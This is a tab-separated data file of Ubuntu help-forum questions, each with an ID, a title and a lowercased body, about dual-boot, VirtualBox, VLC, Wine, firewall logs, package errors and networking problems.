278880	how to create a permanent link to your windows desktop on ubuntu ?	i want to have a way to easily access the desktop of my windows user account from my ubuntu account on my dual-booted machine . of course , i can easily create a link on my ubuntu desktop to the path in my windows file system , however , this link is reported as broken after restarting ubuntu . any advice ?
278890	chromium wo n't load any pages including settings page	chromium would n't load any pages including my settings page . i noticed at the bottom left the status was saying something about loading `` ad-block plus '' .
278893	not able to automatically login	hey i 'd like to login automatically , but havnt gotten the option to do so . i have tried some hints and stuff but nothing has worked so far . im running 12.10 and have xbmc installed ( dont know if it matters , the xbmc ) . here is 2 screenshots of how my settings look . the last 2 lines i have put in myself . ( har restarted after , didnt work and below you see user accounts settings , from after reboot )
278898	virtualbox riddle : `` fatal : no bootable medium found ! system halted . ''	i have installed virtualbox on windows host with ubuntu ( actually xubuntu ) guest . after adding 3 more hard drives ( virtual hard drives ) , i ran ls –l /dev/sd* and there were 3 more drives : dev/sdb dev/sdc dev/sdd then i ran this code to mount them : sudo mkfs –t ext4 /dev/sdb sudo mount –t ext4 /dev/sdb /home/hershalle/sd2 sudo mkfs –t ext4 /dev/sdc sudo mount –t ext4 /dev/sdc /home/hershalle/sd3 sudo mkfs –t ext4 /dev/sdd sudo mount –t ext4 /dev/sdd /home/hershalle/sd4 the next time i tried to log in , i got this message : fatal : no bootable medium found ! system halted . what did i do wrong ? and how do i fix it ? thanks !
278907	lightdm does n't work properly	i have gnome installed on my ubuntu 12.10 and i am using gdm as default display manager . but the greeter for gdm is not working properly and whenever i try to switch back to lightdm the gui just does n't comes up . all it shows is the various service starting display & then nothing happens . the file i edit to change my default display manager is : /etc/x11/defualt-display-manager
278908	xubuntu how to check used and free disk space	how can i check free and used disk space on xubuntu ? on ubuntu , this was very easy to do , but i do n't see a program that accomplishes this now with xubuntu .
278910	how to share my laptop internet connection with android sony xperia tipo ?	my laptop dell inspiron-1525 has dell wireless 1395 wlan mini-card as the wireless network card . does this adapter support ap , can it work as access point ? if yes , can i connect with a sony xperia tipo mobile phone with the above laptop using `` adhoc wireless network '' ? note : my laptop also has an ethernet controller : `` marvell yukon 88e8040 pci-e fast ethernet controller '' through which i can share the internet connection .
278912	mount an iso image in wine ?	i need to install some program in wine , which require to access a mounted iso image . whenever i mount an iso image in nautilus , in which drive it mounted in wine ? for some programs which can find the iso automatically , i have no problem .
278916	vlc wo n't play dvd ubuntu 12.10	i try to play the dvd `` toy story '' with vlc player and installed libdvdcss2 , but when i attempt to play it , vlc just closes . i already ran vlc from the console to get more output before it crashes and this is the output : libdvdnav : using dvdnav version 4.2.0 libdvdread : using libdvdcss version 1.2.12 for dvd access libdvdnav : dvd title : toystory1 libdvdnav : dvd serial number : 3c2b9b99 libdvdnav : dvd title ( alternative ) : toystory1 libdvdnav : unable to find map file '/home/username/.dvdnav/toystory1.map' libdvdnav : dvd disk reports itself with region mask 0x00fd0000 . regions : 2 libdvdread : attempting to retrieve all css keys libdvdread : this can take a _long_ time , please be patient libdvdread : get key for /video_ts/video_ts.vob at 0x00000268 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_01_0.vob at 0x00000b00 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_01_1.vob at 0x00000b10 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_02_0.vob at 0x000011c0 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_02_1.vob at 0x000011d0 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_03_0.vob at 0x000011c0 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_03_1.vob at 0x000011d0 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_04_0.vob at 0x000011c0 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_04_1.vob at 0x000011d0 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_05_0.vob at 0x000011c0 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_05_1.vob at 0x000011d0 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_06_0.vob at 0x000011c0 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_06_1.vob at 0x000011d0 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_07_0.vob at 0x000011c0 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_07_1.vob at 0x000011d0 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_08_0.vob at 0x000011c0 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_08_1.vob at 0x000011d0 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_09_1.vob at 0x00001337 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_10_0.vob at 0x00001425 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_10_1.vob at 0x000016d8 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_11_1.vob at 0x000024c1 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_12_0.vob at 0x00003684 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_12_1.vob at 0x0000a9f4 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_13_1.vob at 0x00010451 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_14_1.vob at 0x0004727a libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_15_0.vob at 0x00061aa7 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_15_1.vob at 0x000aae7c libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_16_0.vob at 0x00061aa7 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_16_1.vob at 0x000aae7c libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_17_0.vob at 0x00061aa7 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_17_1.vob at 0x000aae7c libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_18_0.vob at 0x00061aa7 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_18_1.vob at 0x000aae7c libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_19_0.vob at 0x00061aa7 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_19_1.vob at 0x000aae7c libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_20_0.vob at 0x00061aa7 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_20_1.vob at 0x000aae7c libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_21_0.vob at 0x00061aa7 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_21_1.vob at 0x000aae7c libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_22_0.vob at 0x00061aa7 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_22_1.vob at 0x000aae7c libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_23_0.vob at 0x00061aa7 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_23_1.vob at 0x000aae7c libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_24_0.vob at 0x00061aa7 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_24_1.vob at 0x000aae7c libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_25_0.vob at 0x00061aa7 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_25_1.vob at 0x000aae7c libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_26_1.vob at 0x002cc2a3 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_27_1.vob at 0x002df2e3 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_28_0.vob at 0x0033d2bb libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_28_1.vob at 0x0033d2cb libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_29_0.vob at 0x0033d2bb libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_29_1.vob at 0x0033d2cb libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_30_0.vob at 0x0033d2bb libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_30_1.vob at 0x0033d2cb libdvdread : elapsed time 0 libdvdread : found 30 vts's libdvdread : elapsed time 0 *** libdvdread : check_value failed in ifo_read.c:1264 *** *** for vts_ptt_srpt- > title [ i ] .ptt [ j ] .pgn ! = 0 *** *** libdvdread : check_value failed in ifo_read.c:1994 *** *** for pgci_ut- > nr_of_lus < 100 *** no vts_tmapt available - skipping . speicherzugriffsfehler ( speicherabzug geschrieben ) the last line says `` memory read error ( memory dump written ) '' edit : when opening the dvd , vlc 's memory usage goes up to 3,8gb of the 4gb avaiable to my computer , which is probably the cause of the problem . i hope someone of you has come across this error before and knows what to do ! thanks in advance
278917	how to mount an sd card reader	i have read through many of the help pages around the sd card mounting issues , etc . i do not know whether they relate to my situation or not . what is the first command i should type in the terminal to check if my sd card reader is mounted ? i am working with linux mint 13 .
278918	shrink the size of tmpfs folders	after checking my disk space in xubuntu , i noticed i have files holding unnecessary disk space and not coming close to using it . is there a way to limit the space it is holding ? i have marked the entries with ** . as you can see , they are allocated 7.8 and 3.2 gbs but not coming close to using any of it . can i shrink them down to 2gb each ? filesystem size used avail use % mounted on /dev/sda1 205g 15g 180g 8 % / udev 7.8g 4.0k 7.8g 1 % /dev** tmpfs 7.8g 20k 7.8g 1 % /tmp** tmpfs 3.2g 836k 3.2g 1 % /run** none 5.0m 0 5.0m 0 % /run/lock none 7.8g 88k 7.8g 1 % /run/shm** tmpfs 7.8g 664k 7.8g 1 % /var/log** /home/dustin/.private 205g 15g 180g 8 % /home/dustin
278922	flickering only on vga output on lenovo t400 ( ati radeon hd3400 )	just now installed ubuntu gnome 13.04 and upgrade to latest gnome 3.8 version . on gnome classic when i 'm opening applications it 's flickering on vga 1920x1080 . display settings : *-display description : vga compatible controller product : rv620 [ mobility radeon hd 3400 series ] vendor : advanced micro devices [ amd ] nee ati physical id : 0 bus info : pci @ 0000:01:00.0 version : 00 width : 32 bits clock : 33mhz capabilities : pm pciexpress msi vga_controller bus_master cap_list rom configuration : driver=radeon latency=0 resources : irq:49 memory : d0000000-dfffffff ioport:2000 ( size=256 ) memory : cfff0000-cfffffff memory : cff00000-cff1ffff kernel : xx @ xx : ~ $ uname -a linux xx 3.8.0-16-generic # 26-ubuntu smp mon apr 1 19:55:09 utc 2013 i686 i686 i686 gnu/linux currently is using open source amd ati radeon driver , i 'm not using propriatery driver from amd site . using 3400hd amd radeon . latest driver from amd is amd catalystâ˘ 13.1 proprietary linux x86 display driver released 1/21/2013 , and i 'm not sure can i install it for sure or waiting final release . found kernel version up to 3.4 for proprietary driver . flickering appears only on full hd resolution ( 1920x1080 ) not on 1680x1050 . now , how can i resolve flickering on vga with open source driver ?
278923	ubuntu server as router , static ip for macadr 's	i have ubuntu server as router . on it i have turned on dhcp server , but i want to give static adresses to some devices ( mac adresses ) in my network , where i have to start ? i tried to google it , and i was found nothing : (
278936	weird hardware acceleration issue	i am having a really strange issue with my ubuntu 12.10 computer . i have a computer that is left on 24/7 . lately , after the computer has been on for a while , when i log in to ubuntu , the gui is really slow and glitchy . it 's as if hardware acceleration is disabled . unity runs at around 5 fps , and i cant even scroll through websites because of the enormous lag . if i restart the computer , the issue goes away . after a day or so , it comes back ! here 's some more info : computer specs : intel core i5-2500k @ 5ghz ( overclock ) 24gb ddr3 1333mhz ram dual 60gb ssds 4 1tb storage/backup hdds asrock extreme4 gen3 motherboard gigabyte/nvidia geforce gtx660 graphics card - ( gpu clock @ 549mhz | memory clock @ 3004mhz ) tasks : 232 total , 2 running , 230 sleeping , 0 stopped , 0 zombie % cpu ( s ) : 53.1 us , 4.2 sy , 0.0 ni , 42.5 id , 0.1 wa , 0.0 hi , 0.1 si , 0.0 st kib mem : 24603584 total , 21437068 used , 3166516 free , 1420912 buffers kib swap : 0 total , 0 used , 0 free , 9695376 cached pid user pr ni virt res shr s % cpu % mem time+ command 4023 julian 0 -20 12.5g 3.4g 7200 s 140.5 14.7 8271:18 java 1569 root 20 0 282m 118m 30m r 47.6 0.5 97:29.30 xorg 15730 julian 20 0 409m 97m 55m s 27.0 0.4 7:58.35 chrome 32220 julian 0 -20 12.7g 2.4g 13m s 5.7 10.2 120:30.22 java 2822 julian 20 0 1578m 199m 56m s 2.3 0.8 87:37.55 compiz 17448 julian 20 0 940m 82m 29m s 1.0 0.3 0:08.48 chrome 15692 julian 20 0 784m 144m 48m s 0.7 0.6 0:12.26 chrome 16 root rt 0 0 0 0 s 0.3 0.0 0:00.47 migration/3 335 root 20 0 0 0 0 s 0.3 0.0 1:08.60 kjournald 2845 julian 20 0 1854m 705m 24m s 0.3 2.9 20:50.03 nautilus 2903 julian 20 0 412m 12m 7824 s 0.3 0.1 0:15.90 bamfdaemon 2936 julian 20 0 537m 48m 11m s 0.3 0.2 11:34.38 unity-panel-ser 19249 julian 20 0 510m 18m 11m s 0.3 0.1 0:00.44 gnome-terminal 20124 root 20 0 0 0 0 s 0.3 0.0 0:00.20 kworker/1:3 20196 www-data 20 0 228m 10m 2984 s 0.3 0.0 0:00.12 apache2 1 root 20 0 24584 2472 1288 s 0.0 0.0 0:00.78 init 2 root 20 0 0 0 0 s 0.0 0.0 0:00.01 kthreadd` julian @ julian-desktop : ~ $ sensors coretemp-isa-0000 adapter : isa adapter physical id 0 : +55.0°c ( high = +80.0°c , crit = +98.0°c ) core 0 : +39.0°c ( high = +80.0°c , crit = +98.0°c ) core 1 : +46.0°c ( high = +80.0°c , crit = +98.0°c ) core 2 : +55.0°c ( high = +80.0°c , crit = +98.0°c ) core 3 : +45.0°c ( high = +80.0°c , crit = +98.0°c )
278937	install font for specific language	i 'm using ubuntu in english . i also use arabic to name files and folders . how can i install a default font for specific arabic and another for english ?
278939	chrome book optical disk drive	i do n't know if this is the right place to ask ( if it is not then if someone would guide me to the correct place ) but i want to buy a chrome book and i found out that there is no way to get an external optical drive to work . i found a video on how to install ubuntu on chromebook but my question is that will an external optical drive work on ubuntu that is installed on the chromebook ? or will it not play like in chromeos ? thanks goku .
278940	can not boot into ubuntu 12.10 only xp	i installed ubuntu 12.10 using windows installer . when i rebooted the machine , it gave me the option of booting into xp or ubuntu . the arrow keys would not work . it was set on xp and i could not get it onto ubuntu . so it booted onto xp . any help would be greatly appreciated . anthony
278948	unable to run ubuntu on virtual box : kernel require x86-6pu	i am trying to install ubuntu on oracle virtual box but i am not able to . i tried the same about a year back and it worked like a charm . here are the details : 1 ) installed oracle virtual box version 4.2.10 r84104 2 ) ubuntu iso image my system details : processor : - intel core 2 duo t6500 @ 2.10 ghz ram : - 4 gb os : - windows 7 home premium system type : - 64-bit operating system intel ( r ) 64 architecture : - yes ( got this information from intel processor identification utility , downloaded from intel website. ) intel ( r ) virtual technology : - no every-time , i try to install ubuntu on oracle virtual box or using vmware player or vmware workstation , i get the error message as : this kernel requires a x86-64 cpu , but detected an i686 cpu . unable to boot , please use a kernel appropriate for your cpu .
278950	plex media server on ubuntu 12.10 - fighting with hfs+ ( i guess )	i have ubuntu 12.10 installed along with plex media server 0.9.7.x ( i do n't remember , the latest version anyway ) . i had plex set up on a mac , and i had all of my media content stored in an external hdd formatted as hfs+ journaled . i know linux ca n't write on hfs+ ( at least easily ) , but it reads natively . when i try to add a section to my plex server ( from the web manager ) , it sees my external hdd but it ca n't see its content . is this a known issue ? i could n't find anything about this online .
278951	second usb-port does not work	i 've installed ubuntu 12.10 on my sony vaio svt and everything works fine , except for the second usb port . it seems that everything i put in does not connect . i tried several pen drives and mice . all those items are working on the first usb port . is there a way to fix this ?
278954	adobe after effect alternative , for creating effects	is there any alternative for adobe after effects , on linux that can create effects like these : http : //www.youtube.com/watch ? v=7ay-9y5riqa http : //www.youtube.com/watch ? v=y3tjixkiogy i would prefer open source , but even commercial would be good if there is a linux version .
278956	birds of paradise in vim - does n't work	i want to add this theme birds of paradise to vim . i tried to it do with sudo gedit birds_of_paradise.vim in /usr/share/vim/vim73/colors . then i tried colorscheme birds_of_paradise in .vimrc , but it did n't work . ( i have n't received an error , but when i try to do vim source.cpp it does n't change the color scheme . ) please tell me if you have any idea about what 's wrong . edit : here is my .vimrc , maybe here is the problem
278959	how to make it impossible to mount an ntfs partition ?	i have this external hdd , which has two partitions : one ext4 and one ntfs . however , when i connect it to some devices , the ntfs-3g driver goes crazy and stays in a loop of mounting- > unmounting- > remounting the ntfs partition . i already removed the ntfs-3g package , but i keep getting error messages related to the ntfs partition being `` removed unsafely '' . is there any way i can make this partition invisible to the os ? at least to make it leave the partition alone and not try to do anything with it ? thanks a lot !
278963	google voice and video chat plug-in for ubuntu touch	i 'd like to send and receive phone calls using my google number over wifi . to do this in a browser on my ubuntu desktop i have to install the google voice and video chat plug-in but this dose not seem to be available for ubuntu arm devices . is there anyway to do this yet on ubuntu touch ?
278964	what could be the cause for these strange ufw block entries in my syslog ?	i 've recently noticed a large number of recurring ufw blocks in my syslog . this surprised me as i have no ufw rules set : $ sudo ufw status verbose status : active logging : on ( low ) default : deny ( incoming ) , allow ( outgoing ) new profiles : skip could someone more versed with firewall configurations on ubuntu/linux please tell me why i am getting these entries ? apr 7 20:01:04 mhcubn kernel : [ 18234.747861 ] [ ufw block ] in=eth0 out= mac=01:00:5e:00:00:01:00:04:0e : ef:71 : fe:08:00 src=192.168.178.1 dst=224.0.0.1 len=36 tos=0x00 prec=0xc0 ttl=1 id=3586 df proto=2 apr 7 20:03:09 mhcubn kernel : [ 18359.541595 ] [ ufw block ] in=eth0 out= mac=01:00:5e:00:00:01:00:04:0e : ef:71 : fe:08:00 src=192.168.178.1 dst=224.0.0.1 len=36 tos=0x00 prec=0xc0 ttl=1 id=3587 df proto=2 apr 7 20:05:14 mhcubn kernel : [ 18484.335607 ] [ ufw block ] in=eth0 out= mac=01:00:5e:00:00:01:00:04:0e : ef:71 : fe:08:00 src=192.168.178.1 dst=224.0.0.1 len=36 tos=0x00 prec=0xc0 ttl=1 id=3588 df proto=2 apr 7 20:07:19 mhcubn kernel : [ 18609.129970 ] [ ufw block ] in=eth0 out= mac=01:00:5e:00:00:01:00:04:0e : ef:71 : fe:08:00 src=192.168.178.1 dst=224.0.0.1 len=36 tos=0x00 prec=0xc0 ttl=1 id=3589 df proto=2 apr 7 20:09:24 mhcubn kernel : [ 18733.923467 ] [ ufw block ] in=eth0 out= mac=01:00:5e:00:00:01:00:04:0e : ef:71 : fe:08:00 src=192.168.178.1 dst=224.0.0.1 len=36 tos=0x00 prec=0xc0 ttl=1 id=3590 df proto=2 apr 7 20:10:01 mhcubn cron [ 31522 ] : ( mhc ) cmd ( `` /home/mhc/.scripts/customization/powersaving/battmonitor '' ) apr 7 20:11:29 mhcubn kernel : [ 18858.717504 ] [ ufw block ] in=eth0 out= mac=01:00:5e:00:00:01:00:04:0e : ef:71 : fe:08:00 src=192.168.178.1 dst=224.0.0.1 len=36 tos=0x00 prec=0xc0 ttl=1 id=3591 df proto=2 apr 7 20:13:34 mhcubn kernel : [ 18983.510575 ] [ ufw block ] in=eth0 out= mac=01:00:5e:00:00:01:00:04:0e : ef:71 : fe:08:00 src=192.168.178.1 dst=224.0.0.1 len=36 tos=0x00 prec=0xc0 ttl=1 id=3592 df proto=2 apr 7 20:15:39 mhcubn kernel : [ 19108.306349 ] [ ufw block ] in=eth0 out= mac=01:00:5e:00:00:01:00:04:0e : ef:71 : fe:08:00 src=192.168.178.1 dst=224.0.0.1 len=36 tos=0x00 prec=0xc0 ttl=1 id=3593 df proto=2 apr 7 20:17:01 mhcubn cron [ 582 ] : ( root ) cmd ( cd / & & run-parts -- report /etc/cron.hourly ) apr 7 20:17:44 mhcubn kernel : [ 19233.100675 ] [ ufw block ] in=eth0 out= mac=01:00:5e:00:00:01:00:04:0e : ef:71 : fe:08:00 src=192.168.178.1 dst=224.0.0.1 len=36 tos=0x00 prec=0xc0 ttl=1 id=3594 df proto=2 apr 7 20:19:49 mhcubn kernel : [ 19357.893801 ] [ ufw block ] in=eth0 out= mac=01:00:5e:00:00:01:00:04:0e : ef:71 : fe:08:00 src=192.168.178.1 dst=224.0.0.1 len=36 tos=0x00 prec=0xc0 ttl=1 id=3595 df proto=2 apr 7 20:20:01 mhcubn cron [ 1272 ] : ( mhc ) cmd ( `` /home/mhc/.scripts/customization/powersaving/battmonitor '' ) apr 7 20:21:54 mhcubn kernel : [ 19482.686449 ] [ ufw block ] in=eth0 out= mac=01:00:5e:00:00:01:00:04:0e : ef:71 : fe:08:00 src=192.168.178.1 dst=224.0.0.1 len=36 tos=0x00 prec=0xc0 ttl=1 id=3596 df proto=2 apr 7 20:23:59 mhcubn kernel : [ 19607.480499 ] [ ufw block ] in=eth0 out= mac=01:00:5e:00:00:01:00:04:0e : ef:71 : fe:08:00 src=192.168.178.1 dst=224.0.0.1 len=36 tos=0x00 prec=0xc0 ttl=1 id=3597 df proto=2 apr 7 20:26:04 mhcubn kernel : [ 19732.274979 ] [ ufw block ] in=eth0 out= mac=01:00:5e:00:00:01:00:04:0e : ef:71 : fe:08:00 src=192.168.178.1 dst=224.0.0.1 len=36 tos=0x00 prec=0xc0 ttl=1 id=3598 df proto=2 apr 7 20:28:09 mhcubn kernel : [ 19857.068910 ] [ ufw block ] in=eth0 out= mac=01:00:5e:00:00:01:00:04:0e : ef:71 : fe:08:00 src=192.168.178.1 dst=224.0.0.1 len=36 tos=0x00 prec=0xc0 ttl=1 id=3599 df proto=2 apr 7 20:30:01 mhcubn cron [ 3484 ] : ( mhc ) cmd ( `` /home/mhc/.scripts/customization/powersaving/battmonitor '' ) apr 7 20:30:14 mhcubn kernel : [ 19981.862231 ] [ ufw block ] in=eth0 out= mac=01:00:5e:00:00:01:00:04:0e : ef:71 : fe:08:00 src=192.168.178.1 dst=224.0.0.1 len=36 tos=0x00 prec=0xc0 ttl=1 id=3600 df proto=2 apr 7 20:32:19 mhcubn kernel : [ 20106.657165 ] [ ufw block ] in=eth0 out= mac=01:00:5e:00:00:01:00:04:0e : ef:71 : fe:08:00 src=192.168.178.1 dst=224.0.0.1 len=36 tos=0x00 prec=0xc0 ttl=1 id=3601 df proto=2 apr 7 20:34:24 mhcubn kernel : [ 20231.450561 ] [ ufw block ] in=eth0 out= mac=01:00:5e:00:00:01:00:04:0e : ef:71 : fe:08:00 src=192.168.178.1 dst=224.0.0.1 len=36 tos=0x00 prec=0xc0 ttl=1 id=3602 df proto=2 apr 7 20:36:29 mhcubn kernel : [ 20356.244475 ] [ ufw block ] in=eth0 out= mac=01:00:5e:00:00:01:00:04:0e : ef:71 : fe:08:00 src=192.168.178.1 dst=224.0.0.1 len=36 tos=0x00 prec=0xc0 ttl=1 id=3603 df proto=2 apr 7 20:38:34 mhcubn kernel : [ 20481.038479 ] [ ufw block ] in=eth0 out= mac=01:00:5e:00:00:01:00:04:0e : ef:71 : fe:08:00 src=192.168.178.1 dst=224.0.0.1 len=36 tos=0x00 prec=0xc0 ttl=1 id=3604 df proto=2 apr 7 20:40:01 mhcubn cron [ 5702 ] : ( mhc ) cmd ( `` /home/mhc/.scripts/customization/powersaving/battmonitor '' ) apr 7 20:40:39 mhcubn kernel : [ 20605.832618 ] [ ufw block ] in=eth0 out= mac=01:00:5e:00:00:01:00:04:0e : ef:71 : fe:08:00 src=192.168.178.1 dst=224.0.0.1 len=36 tos=0x00 prec=0xc0 ttl=1 id=3605 df proto=2 apr 7 20:42:44 mhcubn kernel : [ 20730.626727 ] [ ufw block ] in=eth0 out= mac=01:00:5e:00:00:01:00:04:0e : ef:71 : fe:08:00 src=192.168.178.1 dst=224.0.0.1 len=36 tos=0x00 prec=0xc0 ttl=1 id=3606 df proto=2 apr 7 20:44:49 mhcubn kernel : [ 20855.419706 ] [ ufw block ] in=eth0 out= mac=01:00:5e:00:00:01:00:04:0e : ef:71 : fe:08:00 src=192.168.178.1 dst=224.0.0.1 len=36 tos=0x00 prec=0xc0 ttl=1 id=3607 df proto=2 apr 7 20:46:54 mhcubn kernel : [ 20980.214309 ] [ ufw block ] in=eth0 out= mac=01:00:5e:00:00:01:00:04:0e : ef:71 : fe:08:00 src=192.168.178.1 dst=224.0.0.1 len=36 tos=0x00 prec=0xc0 ttl=1 id=3608 df proto=2 apr 7 20:48:59 mhcubn kernel : [ 21105.008870 ] [ ufw block ] in=eth0 out= mac=01:00:5e:00:00:01:00:04:0e : ef:71 : fe:08:00 src=192.168.178.1 dst=224.0.0.1 len=36 tos=0x00 prec=0xc0 ttl=1 id=3609 df proto=2 i have found these threads which point to a multicast problem : http : //ubuntuforums.org/showthread.php ? t=1886913 https : //bbs.archlinux.org/viewtopic.php ? id=142525 https : //issues.apache.org/jira/browse/ts-775 i am no network expert by any means and do n't properly understand what is actually going on . if anyone `` translated '' these so that i comprehend what 's going on , i 'd be very happy .
278967	looking wepage trought localhost	i want to look my webpage saved on my computer but some js and ajax stuf doe n't work , because it 's not on server or something . i understand , that you are suposed to use localhost somehow . how can i set it up ?
278972	alt-gr ( right alt ) key does not work to edit text in wine	using msoffice in wine with some keyboard layouts ( e.g . us_international ) that involve letters that need the alt gr key , i have noticed that it does not work . but then the problem affects all keyboard layouts . all works well in the linux/ubuntu text editors ( leafpad , gedit , libreoffice ) ; i have found the same problem in notepad , and i imagine it is true for all text editing under wine . ( even using text in a music player like foobar2000 involves the same problem ) . what is the cause of this - and can this be fixed ? i 'm using xfce i found this problem reported on ubuntuforums here ( but can not see how the wikipedia link posted there can help . )
278973	how can i use a pip module with quickly ?	i 'm trying to write an application using quickly . i 'm writing a new python 3 file in which i import a module installed via pip3 ( pystache ) . however , when i go to quickly package , i get a traceback error : alex @ ubuntu : ~/development/templater $ quickly package ... ... -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- command returned some errors : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- error : python module pystache not found -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- do you want to continue ( this is not safe ! ) ? y/ [ n ] : how can i ensure that this works , and pystache is picked up by the build system ? at the request of an answer , i 've run which python , which returns /usr/bin/python .
278974	does installing ubuntu desktop modify existing installed packages ?	i 've setup an ubuntu server using virtualbox and vagrant using these instructions : https : //github.com/discourse/discourse/blob/master/docs/vagrant.md i played around with the os using the command line for a while and since i 'm new to all things linux i decided to install the ubuntu desktop using these commands : sudo apt-get update sudo apt-get install ubuntu-desktop -- no-install-recommends before installing the desktop everything worked like it should from a command line . after installing the desktop gui it looks like things are missing or unable to be found . for example going to a command line and typing in `` bundle install '' results in the error the program 'bundle ' is currently not installed . you can install it by typing ... does installing a desktop gui on a ubuntu server screw around with existing installed files or did the `` environment variables '' get jacked with ? what files should i check to fix this ?
278975	how do i bridge two wired network connections	i have an evga 780i sli motherboard with dual ethernet ports . i was just wondering if there was a way to bridge them like i can in windows ?
278977	vpn without lan	my service provider for my cellphone is blocking voip so i had planed to setup a vpn tunnel as a solution . i did that once before but back then my home connection was so slow that it was not meaningful . now i have 100/100mbit and thought i would try again . the problem i 'm facing is that pptpd and maybe vpn in general assume that i have a lan witch i do n't . i guess i 'm a bit confused about what the best solution would be , i could setup a lan since i have a multi horned server but i would like to avoid that out of noise concern ( very small living area for the moment ) . is there another way of doing achieving this ? i was thinking about just trying to route the traffic directly and use my home computer as a gateway but i guess whatever block they have would still be effective , have also considered some proxy solution but i guess it has to be some encryption involved to obscure the traffic and in that case a vpn feels like a cleaner solution anyway . i guess i just want some general tips about what would be the best solution to circumvent the block .
278980	prevent that truecrypt gets administrator rights	if i try to open a truecrypt drive , truecrypt asks me for my administrator-password ( also when i am a normal user ) . i know , that i can prevent this password-asking by editing the sudoers file = giving truecrypt general administrator privileges . but in my eyes , giving truecrypt generally administrator privileges is a security risk . so my question is : how can i edit truecrypt , in the way , that it not wants administrator privileges anymore , to mount a truecrypt volume . ( i do not understand why truecrypt wants/needs administrator-privileges to mount a volume/filesystem . because if i put an usb stick in my computer , it gets mountet without additional administrator privileges . so why shell truecrypt need more privileges ? ) i use ubuntu 12.04
278988	apt-get install problem	i am trying to install sudo apt-get install hal but i get this error ubuntu dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem . i get this error now with any sudo apt-get install i try . when i try sudo dpkg -- configure -a i get sudo dpkg -- configure -a setting up storagemadeeasy ( 4.0-1 ) ... archive : /usr/share/sme_install/unix-mknod-0.04.zip replace /usr/share/sme_install/unix-mknod-0.04/typemap ? [ y ] es , [ n ] o , [ a ] ll , [ n ] one . [ r ] ename : then i do n't know what to rename it to ?
278989	can ubuntu server be run through ubuntu desktop	i have both ubuntu server and ubuntu desktop on a hard drive . but i was wondering if there is a way to have the server running while i am on the desktop version ? does this make sense ?
278990	ubuntu touch app with c++ core and qml interface . how to create ?	how to create ubuntu touch application with c++ core ? in examples i see only pure qml apps .
278992	how to keep wine from creating directories in my home directory ?	i have got a wine installtion with a couple of games , most of which work fabulously . however , wine creates directories in my home for the player data , saves , etc . is there a way to have those in ~/.winesaves or something similar ? i would prefer wine not littering my home directory . ( wine : 1.5.27 , game in question was scii and de : iw ) edit to clarify : everything in ~/.wine is fine and good , but i do n't want applications to create ~/gamesaves or the likes .
